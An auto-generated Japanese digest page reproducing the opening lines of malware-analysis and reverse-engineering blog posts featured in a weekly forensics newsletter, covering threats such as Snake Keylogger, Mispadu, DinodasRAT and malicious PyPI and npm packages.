本エントリは This Week in 4n6 (FourAndSix=Forensics) で紹介された各記事の冒頭を表示し、チェックする記事をザッピングするために自動生成&投稿したものです。4n6 は こちら からご確認いただけます。
MALWARE
Adam at Hexacorn
Posted on 2024-03-31 by adam As many of you know, I am a big fan of Frida framework and I love its intuitiveness and flexibility, especially when it comes to auto-generating handlers for hooked functions, even if they are randomly chosen. In my older Frida Delphi project I focused on functions that I could define. Today, I will focus on functions that are unknown. How? We are going to write an IdaPython script that will generate simple logging/tracing function stubs for all the subroutines that ...
Any.Run
March 25, 2024 Add comment 1478 views 22 min read HomeMalware AnalysisReverse Engineering Snake Keylogger: Full .NET Malware Analysis Walkthrough Recent posts Basic Malware Packers: What are They and How to Analyze Them in ANY.RUN 932 0 New BunnyLoader Version Gains Modular Capabilities 335 0 What are Threat Intelligence Feeds? 276 0 HomeMalware AnalysisReverse Engineering Snake Keylogger: Full .NET Malware Analysis Walkthrough Introduction In order to understand malware comprehensively, it is e...
March 26, 2024 Add comment 276 views 7 min read HomeCybersecurity LifehacksWhat are Threat Intelligence Feeds? Recent posts Basic Malware Packers: What are They and How to Analyze Them in ANY.RUN 932 0 New BunnyLoader Version Gains Modular Capabilities 335 0 What are Threat Intelligence Feeds? 276 0 HomeCybersecurity LifehacksWhat are Threat Intelligence Feeds? Threat Intelligence Feeds are data streams of indicators of compromise (like malicious domains, IP addresses, links and file hashes). Th...
March 27, 2024 Add comment 335 views 3 min read HomeCybersecurity LifehacksNew BunnyLoader Version Gains Modular Capabilities Recent posts Basic Malware Packers: What are They and How to Analyze Them in ANY.RUN 932 0 New BunnyLoader Version Gains Modular Capabilities 335 0 What are Threat Intelligence Feeds? 276 0 HomeCybersecurity LifehacksNew BunnyLoader Version Gains Modular Capabilities BunnyLoader is a rapidly evolving malware written in C/C++. Originally released in September 2023, it has ...
March 28, 2024 Add comment 932 views 9 min read HomeCybersecurity LifehacksBasic Malware Packers: What are They and How to Analyze Them in ANY.RUN Recent posts Basic Malware Packers: What are They and How to Analyze Them in ANY.RUN 932 0 New BunnyLoader Version Gains Modular Capabilities 335 0 What are Threat Intelligence Feeds? 276 0 HomeCybersecurity LifehacksBasic Malware Packers: What are They and How to Analyze Them in ANY.RUN Sneaking an .exe file into a system without the anti-virus being...
ASEC
AhnLab SEcurity intelligence Center (ASEC) recently discovered the Kimsuky group distributing malware disguised as an installer from a Korean public institution. The malware in question is a dropper that creates the Endoor backdoor, which was also used in the attack covered in the previous post, “TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)”. [1] While there are no records of the dropper being used in actual attacks, there was an attack case that inv...
Bart at Blaze’s Security Blog
IntroductionEarlier last week, I ran into a sample that turned out to be PureCrypter, a loader and obfuscator for all different kinds of malware such as Agent Tesla and RedLine. Upon further investigation, I developed Yara rules for the various stages, which can be found here (excluding the final payload):PureZipPureCrypter2nd stage downloader (PureLogStealer related)With that out of the way, all of this reminded me of the fact that we can also write Yara rules for unique identifiers specific to...
Tatjana Ljucovic at cyber.wtf
Destructive IoT Malware Emulation – Part 1 of 3 – Environment Setup Everyone who has delved a bit into malware analysis knows that you don’t actually need much: a PC, a suitably configured VM, and the necessary analysis tools – and, of course, the malware itself. This is a simplified representation, but it captures the essence of the process. This approach is effective because the malware we typically analyze is compiled for the x86/x86_64 architecture. However, how do we handle the dynamic anal...
Dr Josh Stroschein
YouTube video
YouTube video
Igor Skochinsky at Hex Rays
Posted on: 27 Mar 2024 By: Igor Skochinsky Categories: IDA Pro Tags: idapro idatips shortcuts We’ve covered simple enums previously, but there is a different kind of enum that you may sometimes encounter or need to create manually. They are used to represent various bits (or flags) which may be set in an integer value. For example, the file mode on Unix filesystems contains Access Permission bits (you can see them in the output of ls as string like -rwxr-xr-x), and each bit has a corresponding c...
Arnold Osipov at Morphisec
Breaking Boundaries: Mispadu's Infiltration Beyond LATAM Posted by Arnold Osipov on March 26, 2024 Find me on: LinkedIn Twitter Tweet Recently, Morphisec Labs identified a significant increase in activity linked to Mispadu (also known as URSA), a banking trojan first flagged by ESET in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign. Introduction Mispadu is a highly active banking trojan and Infostealer, now...
Joshua Kamp at NCC Group
LTair: The LTE Air Interface Tool The Development of a Telco Attack Testing Tool Public Report – AWS Nitro System API & Security Claims Italian Public Report – AWS Nitro System API & Security Claims French Public Report – AWS Nitro System API & Security Claims Spanish Public Report – AWS Nitro System API & Security Claims German Unmasking Lorenz Ransomware: A Dive into Recent Tactics, Techniques and Procedures Puckungfu 2: Another NETGEAR WAN Command Injection Public Report: Aleo snarkOS Impleme...
PetiKVX
Mar 24, 2024 • petikvx Share on: Version at ANY.RUN VT Link File Information file Type PE32+ executable (console) x86-64, for MS Windows Compiler Microsoft Visual C/C++ (19.29.30140) [LTCG/C++] Linker Microsoft Linker (14.29.30140) Tool Visual Studio (2019 version 16.11) File size 203.00 KB (207872 bytes) Creation Time 2023-10-22 00:24:41 UTC Infection process The malware will search for all files except those with extensions .exe, .dll, and .sys. When it finds a file, it will open it and write ...
Mar 25, 2024 • petikvx Share on: Version at ANY.RUN VT Link VT Link Deobfuscation pic.twitter.com/j4Ty5K2wUi— petikvx (@petikvx) March 20, 2024 File Informations This ransomware is written in VB.NET and is protected with the .NET Reactor tool. The malware makes it appear as if it was authored by our colleagues MalwareHunterteam (//malwarehunterteam.com/ - //twitter.com/malwrhunterteam), but it is not the case. We will thus use NETReactorSlayer to deprotect it. Here are the results before and aft...
Phylum
On 26 March 2024, Phylum’s automated risk detection platform picked up yet another typosquat campaign targeting some attackers’ favorite targets in PyPI. As of writing, this attack still appears to be active and has come in two big waves after about a 20-hour break in between. So far, we’ve seen over 500 typosquat variations published targeting the following popular Python libraries:requestspy-cordcoloramacapmonstercloudclientpillowbip-utilsTensorFlowBeautifulSoupPyGamesimplejsonmatplotlibpytorc...
On 26 March 2024, Phylum’s automated risk detection platform flagged a suspicious publication to npm called vue2util. It bills itself as, and upon first glance appears to be, a simple collection of utility functions for various purposes such as working with objects, arrays, strings, and files. However, hidden in plain sight at the end of the file is a call to a function called loadScript that, unsurprisingly, loads and executes a script from a remote IP. Upon investigation, we found a cryptojack...
Tom Elkins at Rapid7
Stories from the SOC Part 1: IDAT Loader to BruteRatel Mar 28, 2024 10 min read Tom Elkins Last updated at Fri, 29 Mar 2024 18:35:13 GMT Rapid7’s Managed Detection and Response (MDR) team continuously monitors our customers' environments, identifying emerging threats and developing new detections.In August 2023, Rapid7 identified a new malware loader named the IDAT Loader. Malware loaders are a type of malicious software designed to deliver and execute additional malware onto a victim's system. ...
Petar Kirhmajer at ReversingLabs
Here's what the RL research team knows about the suspicious SqzrFramework480 campaign, which is still available on the NuGet repository. Blog Author Petar Kirhmajer, Threat Researcher, ReversingLabs. Read More... A recent scan by ReversingLabs of the open source package manager NuGet uncovered a suspicious package, SqzrFramework480, that may be targeting developers working with technology made by a China-based firm that does industrial- and digital equipment manufacturing. In this blog post, we'...
Ryan at Intel Corgi
IntelCorgi Mar 24, 2024 Summary On 22 December, 2023 the journalist group Bellingcat tweeted that they had been the target of a malicious email message which spoofed USAID, and eventually led to the download of a “malicious file”. During the course of my analysis I was able to replicate the infection chain, and build detection rules as a result. The sequence of events results in deploying an HTTP reverse shell based on an open-source offensive security tool which enabled the threat actors to har...
Securelist
Malware descriptions 28 Mar 2024 minute read Table of Contents Initial infection overviewVictim ID generation and persistenceC2 CommunicationEncryptionInfrastructureVictimsConclusionIndicators of compromise Authors Anderson Leite Lisandro Ubiedo DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target’s computer. A Windows version of this RAT was used...
SonicWall
By Security NewsMarch 25, 2024OverviewThis week, the Sonicwall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the C2. There is currently no malware family affiliated, but the IP and URL addresses have been used by AgentTesla, GuLoader, PureLog Stealer and others.Technical AnalysisThe sample is...
Vlad at ‘Слава Україні — Героям Слава!’
from Vladyslav Radetsky Кому не зручно дивитись на slideshare, можуть взяти pdf (~ 1,8 Mb) Будьте здорові, уважні та обережні. Слідкуйте за нашою сторінкою у Facebook Слава Україні. VR Share this:Click to share on Twitter (Opens in new window)Click to share on Facebook (Opens in new window)Click to share on LinkedIn (Opens in new window)Click to email a link to a friend (Opens in new window)Click to print (Opens in new window)Like Loading... Tags: exiftool, LNK, malware, msoffice, oletools, Opti...
